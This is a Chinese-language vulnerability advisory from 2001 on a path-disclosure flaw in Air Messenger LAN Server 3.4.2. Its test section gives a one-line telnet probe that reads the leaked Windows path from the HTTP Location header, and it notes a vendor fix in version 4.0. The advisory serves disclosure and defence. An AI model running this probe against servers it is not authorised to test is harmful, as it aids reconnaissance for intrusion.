发布日期：2001-06-18
更新日期：2001-06-25

受影响系统：

Internet Software Solutions Air Messenger LAN Server 3.4.2
   - Microsoft Windows ME
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows 2000

描述：

---

BUGTRAQ  ID: 2881
CVE(CAN) ID: CAN-2001-0788

Air Messenger LAN Server允许用户通过一个Web网关来进行电话、邮件信息的交换。   

远程用户可以轻易地获取敏感文件的物理路径，只要检查web服务器返回的http头中
'Location"域即可。

<*来源：SNS Research (vuln-dev@greyhack.com) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

SNS Research (vuln-dev@greyhack.com)提供了如下测试代码：
$ telnet target 80|grep Location

Location: http://C:\PROGRA~1\ISS\AIRMES~1\Messages
Connection closed by foreign host.


建议：

---

厂商补丁：

Air Messenger LAN Server 4.0将会解决这个问题。
我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.internetsoftwaresolutions.org


浏览次数：3908
严重程度：0（网友投票）